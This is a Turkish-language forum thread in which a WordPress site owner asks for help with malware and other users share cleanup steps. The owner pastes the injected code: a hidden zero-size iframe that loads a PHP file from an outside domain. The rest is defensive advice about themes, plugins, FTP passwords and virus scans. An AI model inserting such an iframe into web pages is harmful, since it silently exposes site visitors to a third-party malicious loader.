batur hocam vakıt ayırdıgın ıcın tesekkurler, sıtedekı her sayfada view source içerisinde yer alıyor.ilgili satır aşağıdaki gibidir.Hangi dosyadan bulaştı nerede duruyor çözemedim halaSelam. Hangi dosyaya bulaştı?
</iframe><iframe src="http://phoenix-credit.com/wp-content/cache.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Tema w***z olmasa da bazı temalarda bu sorunu bende yaşadım zamanında ve genelde temayı ftp den indirip notepad veya başka bir programla açınca görünmeyebiliyor bazen. Ben cpanel den file managerden görebiliyordum ve oradan düzenliyordum dosyayı. config.php izinlerini 0444 yapsan da tema içinde sürekli kendisini çalıştıran bir dosya var ve yeniden geliyor. Bazende DNS ayarlarında A kaydı oluşturarak site her yere senin mail adresinden binlerce mail gönderiyor. Sıunucunda PHP mail fonksiyonu kapalıysa ve SMTP de gönderim limiti varsa sorun olmuyor ama yoksa sıkıntı.
Ben o temayı kullanmaktan vazgeçerek, temiz bir wordpress kurulumu yaptım eski siteden verileri dışarı aktardım ve yeni siteye yükledim. O şekilde kurtulmuştum. İnşallah daha az sıkınıtıyla kurtulursun hocam.
Bu arada ftp şifresini mutlaka değiştir hocam.
Var olan temadan değil tema dizininde bulunan başka temalardan da bulaşabiliyor hocam. Kullandığınız tema hariç temaları silin. Zararlı kodları bulup silmeye çalışın ftp şifrelerini değiştirin.
Bilgisayarda da virüs taraması yapın tekrar şifr değiştirin vb işlemler işte
wp.org dışında eklentiniz varsa onları silin. Zararlı kodu bulup silip ve dediklerimi yptıktan snra hala geri geliyorsa virüs format da gerekebilir çünkü filezilladan ulaşıyor olabilirler sitene.hocam zaten o sekılde kullanıyorum.sıtelerde pasıf durumda olan hıb bır eklentı ya da temadı bekletmem, dırekt sılerım.
vmware de yenı bır pc kurarak dosya transferlerını yaptım.sorun temadaydı, temayı sılım yenı dosyaları kopyalayınca miss gibi olduwp.org dışında eklentiniz varsa onları silin. Zararlı kodu bulup silip ve dediklerimi yptıktan snra hala geri geliyorsa virüs format da gerekebilir çünkü filezilladan ulaşıyor olabilirler sitene.
Uzun zaman önce bu virüsü temizlemek için çok uğraşmıştım.
Ben kodun hangi dosyalara bulaştığını anlamak için Advanced Find And Replace programını kullanmıştım. Dosyalarda toplu arama yapmaya yarar bu program.
Virüs bilgisayara bulaşıyordu diye hatırlıyorum. Ftp şifresini değiştirsek dahi ftpye bağlanınca kodlar tekrar yükleniyordu. Tekrar bu sorunla karşılaşırsanız bilgisayardaki virüsü temizlemek(mümkünse format), ftp şifresini değiştirmek kesin çözüm olur.